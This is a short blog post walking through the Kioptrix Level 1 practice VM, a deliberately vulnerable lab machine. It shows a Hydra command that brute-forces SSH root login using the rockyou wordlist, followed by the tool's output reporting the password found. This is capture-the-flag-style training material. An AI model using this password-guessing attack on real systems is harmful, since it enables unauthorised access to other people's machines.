Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 3 (SSH)

Hi folks, ok, another option that we have to break into kioptix level 1, is bruteforce ssh, its quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack down via bruteforce.
In your backtrack type:
cd /pentest/passwords/wordlists/
hydra -l root -P rockyou.txt -t 3 -o login.pwd ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra ( starting at 2012-08-08 13:33:19
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host:   login: root   password: 123456
[STATUS] attack finished for (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra ( finished at 2012-08-08 13:33:36

As you can see, it found the pasword 123456 for the user root.

PS : I changed the root password to 123456 for this demonstration only.

No comments:

Post a Comment